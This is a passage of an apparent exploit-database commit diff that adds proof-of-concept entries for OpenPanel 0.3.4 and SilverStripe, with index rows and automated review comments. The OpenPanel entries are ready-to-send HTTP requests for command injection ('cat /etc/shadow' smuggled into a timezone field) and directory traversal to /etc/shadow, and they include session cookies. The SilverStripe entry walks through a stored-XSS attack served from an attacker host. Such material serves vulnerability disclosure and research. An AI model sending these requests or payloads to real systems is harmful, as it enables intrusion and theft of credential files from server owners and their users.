Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
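Review bot: The captured requests keep live-looking values that should be placeholders before publication: the `Cookie: session=…` values and the `demo.openpanel.org:2083` host appear in every request of this entry and again in the Incorrect Access Control, OS Command Injection and Copy/View Directory Traversal entries of this merge. Replacing them with `<TARGET_HOST>` and `<SESSION_COOKIE>` avoids publishing what may still be a usable session token and keeps the examples target-neutral. The CVE headers are also worth checking: this entry carries CVE-2024-53537, while the Copy/View Directory Traversal entry, which repeats the same `/view_file` request, carries CVE-2024-53582 — the id the Incorrect Access Control entry uses as well.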


@ -0,0 +1,23 @@
# Exploit Title: OpenPanel 0.3.4 - Incorrect Access Control
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53582
GET /files/../.. HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyEag.70MOWk6Q4cZWoRbciZO94dsGxgw
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers


@ -0,0 +1,27 @@
# Exploit Title: OpenPanel 0.3.4 - OS Command Injection
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53584
POST /server/timezone HTTP/2
Host: demo.openpanel.org:2083
Cookie: minimenu=0; session=eyJfZnJlc2giOmZhbHNlLCJ1c2VyX2lkIjozfQ.ZyyaKQ.HijWQTQ_I0yftDYEqqqqRR_FuRU; theme=dark
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/server/timezone
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Origin: https://demo.openpanel.org:2083
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
timezone=;cat+/etc/shadow+>+/home/stefan/secret.txt


@ -0,0 +1,22 @@
# Exploit Title: OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53582
GET /view_file?filename=shadow&path_param=/etc HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers


@ -0,0 +1,55 @@
# Exploit Title: SilverStripe 5.3.8 - Stored Cross Site Scripting (XSS) (Authenticated)
# Date: 2025-01-15
# Exploit Author: James Nicoll
# Vendor Homepage: https://www.silverstripe.org/
# Software Link: https://www.silverstripe.org/download/
# Category: Web Application
# Version: 5.2.22
# Tested on: SilverStripe 5.2.22 - Ubuntu 24.04
# CVE : CVE-2024-47605
## Explanation:
When using the "insert media" functionality, the linked oEmbed JSON includes an HTML attribute which will replace the embed shortcode. The HTML is not sanitized before replacing the shortcode, allowing a script payload to be executed on both the CMS and the front-end of the website.
## Requirements
1. A Silverstripe CMS website.
2. Valid login credentials for a user with page edit rights.
3. An attacker server hosting malicious payload.
## On the attacker server:
1. Create an html file with oembded information:
```
<html>
<head>
<link rel="alternate" type="application/json+oembed" href="http://<attacker_server_ip>/oembed.json" title="Payload" />
</head>
<body>
<img src="media.jpg">
</body>
</html>
```
2. Create the json file with XSS payload:
```
{
"title": "Title",
"author_name": "author",
"type": "video",
"height": 113,
"width": 200,
"version": "1.0",
"provider_name": "FakeSite",
"thumbnail_height": 360,
"thumbnail_width": 480,
"thumbnail_url": "http://<attacker_server_ip>/media.jpg",
"html":"<script>alert('hello world');</script>"
}
```
3. The media.jpg file can be any image.
4. Host these files on a publicly available website
## On the SilverStripe website:
1. Log into the admin portal with a user account that has page editor rights (or higher).
2. Select the page you wish to load the malicious content into.
3. Within the editor panel, select the "Insert Media via URL" button.
4. Enter the IP/Hostname of the attacker server.
5. Click Add Media, Insert Media, and then save and publish the page.
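Review bot: The Exploit Title line names SilverStripe 5.3.8, but the Version and Tested on lines say 5.2.22, and the index row for 52199 in files_exploits.csv repeats 5.3.8; one of these should be corrected so it is clear which release was actually confirmed affected. The hunk header declares 55 lines while 51 are shown, so the blank lines between the sections appear to have been dropped by the renderer. The Explanation paragraph already identifies the root cause as the unsanitized `html` member of the oEmbed JSON; stating the mitigation explicitly, e.g. `Mitigation: sanitize or escape the oEmbed html field before it replaces the shortcode`, would make the advisory self-contained for defenders.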


@ -10406,6 +10406,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
52184,exploits/multiple/hardware/52184.txt,"ABB Cylon FLXeon 9.3.4 - WebSocket Command Spawning",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,CVE-2024-48849,,,,,
52160,exploits/multiple/hardware/52160.py,"Cosy+ firmware 21.2s7 - Command Injection",2025-04-10,CodeB0ss,hardware,multiple,,2025-04-10,2025-04-13,0,CVE-2024-33896,,,,,
52183,exploits/multiple/hardware/52183.txt,"Netman 204 - Remote command without authentication",2025-04-11,"Parsa Rezaie Khiabanloo",hardware,multiple,,2025-04-11,2025-04-11,0,,,,,,
52191,exploits/multiple/hardware/52191.py,"ZTE ZXHN H168N 3.1 - Remote Code Execution (RCE) via authentication bypass",2025-04-14,"tasos meletlidis",hardware,multiple,,2025-04-14,2025-04-14,0,,,,,,
11651,exploits/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Local Privilege Escalation",2010-03-07,kingcope,local,multiple,,2010-03-06,,1,,,,,,
51849,exploits/multiple/local/51849.py,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc",2024-03-03,"George Washington",local,multiple,,2024-03-03,2024-03-03,0,,,,,,
38835,exploits/multiple/local/38835.py,"abrt (Centos 7.1 / Fedora 22) - Local Privilege Escalation",2015-12-01,rebel,local,multiple,,2015-12-01,2018-11-17,1,CVE-2015-5287;CVE-2015-5273;OSVDB-130747;OSVDB-130746;OSVDB-130745;OSVDB-130609,,,http://www.exploit-db.com/screenshots/idlt39000/screen-shot-2015-12-03-at-40702-pm.png,,
@ -10916,6 +10917,11 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
23136,exploits/multiple/remote/23136.txt,"futurewave webx server 1.1 - Directory Traversal",2003-09-10,dr_insane,remote,multiple,,2003-09-10,2012-12-04,1,OSVDB-2531,,,,,https://www.securityfocus.com/bid/8583/info
35805,exploits/multiple/remote/35805.txt,"Gadu-Gadu 10.5 - Remote Code Execution",2011-05-28,"Kacper Szczesniak",remote,multiple,,2011-05-28,2015-01-17,1,,,,,,https://www.securityfocus.com/bid/48030/info
35792,exploits/multiple/remote/35792.txt,"Gadu-Gadu Instant Messenger 6.0 - File Transfer Cross-Site Scripting",2011-05-24,"Kacper Szczesniak",remote,multiple,,2011-05-24,2015-01-15,1,,,,,,https://www.securityfocus.com/bid/47957/info
52200,exploits/multiple/remote/52200.txt,"GestioIP 3.5.7 - Cross-Site Request Forgery (CSRF)",2025-04-14,"Maximiliano Belino",remote,multiple,,2025-04-14,2025-04-14,0,CVE-2024-50858,,,,,
52203,exploits/multiple/remote/52203.txt,"GestioIP 3.5.7 - Cross-Site Scripting (XSS)",2025-04-14,"Maximiliano Belino",remote,multiple,,2025-04-14,2025-04-14,0,CVE-2024-50857,,,,,
52202,exploits/multiple/remote/52202.txt,"GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS)",2025-04-14,"Maximiliano Belino",remote,multiple,,2025-04-14,2025-04-14,0,CVE-2024-50859,,,,,
52204,exploits/multiple/remote/52204.txt,"GestioIP 3.5.7 - Remote Command Execution (RCE)",2025-04-14,"Maximiliano Belino",remote,multiple,,2025-04-14,2025-04-14,0,CVE-2024-48760,,,,,
52201,exploits/multiple/remote/52201.txt,"GestioIP 3.5.7 - Stored Cross-Site Scripting (Stored XSS)",2025-04-14,"Maximiliano Belino",remote,multiple,,2025-04-14,2025-04-14,0,CVE-2024-50861,,,,,
41684,exploits/multiple/remote/41684.rb,"GIT 1.8.5.6/1.9.5/2.0.5/2.1.4/2.2.1 & Mercurial < 3.2.3 - Multiple Vulnerabilities (Metasploit)",2014-12-18,Metasploit,remote,multiple,,2017-03-23,2017-03-23,1,CVE-2013-0758;CVE-2013-0757,,,,,https://github.com/rapid7/metasploit-framework/blob/1d617ae3894222cfbbf6951fcd68fd2d1c1b15c6/modules/exploits/multi/http/git_client_command_exec.rb
33990,exploits/multiple/remote/33990.rb,"Gitlist - Remote Command Execution (Metasploit)",2014-07-07,Metasploit,remote,multiple,80,2014-07-07,2014-07-08,1,CVE-2014-4511;OSVDB-108504;CVE-2013-7392,"Metasploit Framework (MSF)",,http://www.exploit-db.com/screenshots/idlt34000/screen-shot-2014-07-08-at-64236-pm.png,http://www.exploit-db.comgitlist-0.4.0.tar.gz,
33929,exploits/multiple/remote/33929.py,"Gitlist 0.4.0 - Remote Code Execution",2014-06-30,drone,remote,multiple,,2014-06-30,2014-07-08,1,CVE-2014-5023;OSVDB-108504;OSVDB-108503;CVE-2014-4511;CVE-2013-7392,,,http://www.exploit-db.com/screenshots/idlt34000/screen-shot-2014-07-08-at-62343-pm.png,http://www.exploit-db.comgitlist-0.4.0.tar.gz,
@ -12182,6 +12188,10 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49483,exploits/multiple/webapps/49483.txt,"Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated) (1)",2021-01-27,SunCSR,webapps,multiple,,2021-01-27,2021-03-18,1,,,,,,
49556,exploits/multiple/webapps/49556.py,"Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)",2021-02-11,"Metin Yunus Kandemir",webapps,multiple,,2021-02-11,2021-03-18,1,,,,,,
49649,exploits/multiple/webapps/49649.txt,"openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting",2021-03-15,"Hosein Vita",webapps,multiple,,2021-03-15,2021-03-16,0,CVE-2021-27695,,,,,
52195,exploits/multiple/webapps/52195.txt,"OpenPanel 0.3.4 - Directory Traversal",2025-04-14,"Korn Chaisuwan_ Charanin Thongudom_ Pongtorn Angsuchotmetee",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-53537,,,,,
52196,exploits/multiple/webapps/52196.txt,"OpenPanel 0.3.4 - Incorrect Access Control",2025-04-14,"Korn Chaisuwan_ Charanin Thongudom_ Pongtorn Angsuchotmetee",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-53582,,,,,
52197,exploits/multiple/webapps/52197.txt,"OpenPanel 0.3.4 - OS Command Injection",2025-04-14,"Korn Chaisuwan_ Charanin Thongudom_ Pongtorn Angsuchotmetee",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-53584,,,,,
52198,exploits/multiple/webapps/52198.txt,"OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal",2025-04-14,"Korn Chaisuwan_ Charanin Thongudom_ Pongtorn Angsuchotmetee",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-53582,,,,,
46118,exploits/multiple/webapps/46118.txt,"OpenSource ERP 6.3.1. - SQL Injection",2019-01-10,"Emre ÖVÜNÇ",webapps,multiple,80,2019-01-10,2019-01-10,0,CVE-2019-5893,"SQL Injection (SQLi)",,,http://www.exploit-db.comerp_6.3.1.exe,
38640,exploits/multiple/webapps/38640.rb,"OpenSSL - Alternative Chains Certificate Forgery",2015-11-05,"Ramon de C Valle",webapps,multiple,,2015-11-05,2015-11-05,0,CVE-2015-1793;OSVDB-124300,,,,,
49578,exploits/multiple/webapps/49578.txt,"OpenText Content Server 20.3 - 'multiple' Stored Cross-Site Scripting",2021-02-19,"Kamil Breński",webapps,multiple,,2021-02-19,2021-02-19,0,,,,,,
@ -12239,7 +12249,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49736,exploits/multiple/webapps/49736.txt,"phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)",2021-04-01,"Valerio Severini",webapps,multiple,,2021-04-01,2021-04-01,0,,,,,,
49192,exploits/multiple/webapps/49192.txt,"Phpscript-sgh 0.1.0 - Time Based Blind SQL Injection",2020-12-04,KeopssGroup0day_Inc,webapps,multiple,,2020-12-04,2020-12-04,0,,,,,,
46935,exploits/multiple/webapps/46935.txt,"Phraseanet < 4.0.7 - Cross-Site Scripting",2019-05-28,"Krzysztof Szulski",webapps,multiple,,2019-05-28,2019-05-28,0,,,,,,
52194,exploits/multiple/webapps/52194.py,"Pimcore 11.4.2 - Stored cross site scripting",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11954,,,,,
35623,exploits/multiple/webapps/35623.txt,"Pimcore CMS 2.3.0/3.0 - SQL Injection",2014-12-27,Vulnerability-Lab,webapps,multiple,,2014-12-27,2014-12-27,0,OSVDB-116460,,,,,
52193,exploits/multiple/webapps/52193.py,"Pimcore customer-data-framework 4.2.0 - SQL injection",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11956,,,,,
49519,exploits/multiple/webapps/49519.html,"Pixelimity 1.0 - 'password' Cross-Site Request Forgery",2021-02-03,Noth,webapps,multiple,,2021-02-03,2021-02-03,0,CVE-2020-23522,,,,,
50426,exploits/multiple/webapps/50426.txt,"Plastic SCM 10.0.16.5622 - WebAdmin Server Access",2021-10-18,"Basavaraj Banakar",webapps,multiple,,2021-10-18,2021-10-18,0,CVE-2021-41382,,,,,
34136,exploits/multiple/webapps/34136.txt,"Plesk Server Administrator (PSA) - 'locale' Local File Inclusion",2010-06-21,"Pouya Daneshmand",webapps,multiple,,2010-06-21,2014-07-22,1,,,,,,https://www.securityfocus.com/bid/40813/info
@ -12309,6 +12321,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
36794,exploits/multiple/webapps/36794.txt,"SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities",2015-04-21,Vulnerability-Lab,webapps,multiple,,2015-04-21,2015-04-21,0,,,,,,https://www.vulnerability-lab.com/get_content.php?id=1314
51150,exploits/multiple/webapps/51150.txt,"Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)",2023-03-30,"Andrey Stoykov",webapps,multiple,,2023-03-30,2023-03-30,0,,,,,,
48712,exploits/multiple/webapps/48712.txt,"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)",2020-07-26,bdrake,webapps,multiple,,2020-07-26,2020-07-26,0,,,,,,
52199,exploits/multiple/webapps/52199.txt,"SilverStripe 5.3.8 - Stored Cross Site Scripting (XSS) (Authenticated)",2025-04-14,"James Nicoll",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-47605,,,,,
50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,,2021-06-30,2021-06-30,0,,,,,,
51796,exploits/multiple/webapps/51796.txt,"SISQUALWFM 7.1.319.103 - Host Header Injection",2024-02-15,"Omer Shaik",webapps,multiple,,2024-02-15,2024-02-15,0,,,,,,
52035,exploits/multiple/webapps/52035.txt,"Sitefinity 15.0 - Cross-Site Scripting (XSS)",2024-06-03,"Aldi Saputra Wahyudi",webapps,multiple,,2024-06-03,2024-06-03,0,CVE-2023-27636,,,,,
@ -12453,6 +12466,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
11404,exploits/multiple/webapps/11404.txt,"X-Cart Pro 4.0.13 - SQL Injection",2010-02-11,s4squatch,webapps,multiple,80,2010-02-10,,1,,,,,,
33578,exploits/multiple/webapps/33578.txt,"XAMPP 1.6.x - 'showcode.php' Local File Inclusion",2009-07-16,MustLive,webapps,multiple,,2009-07-16,2017-07-19,1,,,,,http://www.exploit-db.comxampp-win32-1.6.8.exe,https://www.securityfocus.com/bid/37999/info
10170,exploits/multiple/webapps/10170.txt,"Xerver 4.31/4.32 - HTTP Response Splitting",2009-11-18,s4squatch,webapps,multiple,80,2009-11-17,,1,CVE-2009-4086;OSVDB-60657,,,,http://www.exploit-db.comxerver_432.zip,
52192,exploits/multiple/webapps/52192.py,"Xinet Elegant 6 Asset Lib Web UI 6.1.655 - SQL Injection",2025-04-14,hyp3rlinx,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2019-19245,,,,,
49827,exploits/multiple/webapps/49827.js,"Xmind 2020 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,,
34237,exploits/multiple/webapps/34237.txt,"Xplico 0.5.7 - 'add.ctp' Cross-Site Scripting (2)",2010-07-02,"Marcos Garcia & Maximiliano Soler",webapps,multiple,,2010-07-02,2014-08-02,1,,,,,,https://www.securityfocus.com/bid/41322/info
49073,exploits/multiple/webapps/49073.txt,"xuucms 3 - 'keywords' SQL Injection",2020-11-19,icekam,webapps,multiple,,2020-11-19,2020-11-19,0,CVE-2020-28091,,,,,
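Review bot: Rows 52196 ("OpenPanel 0.3.4 - Incorrect Access Control") and 52198 ("OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal") both carry CVE-2024-53582, while row 52195, also a Directory Traversal, carries CVE-2024-53537; the 52198 file header above also says CVE-2024-53582, so the 52196 row is the one most likely to need checking against the CVE record. The author column for the four OpenPanel rows lists "Charanin Thongudom" as the second author, whereas the exploit file headers in this commit name Punthat Siriwan; the index should agree with the files it points to. Row 52199 records SilverStripe 5.3.8 although that file's Version line says 5.2.22, which should be reconciled with the file. The other added rows look consistent with their file headers as far as this page shows.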
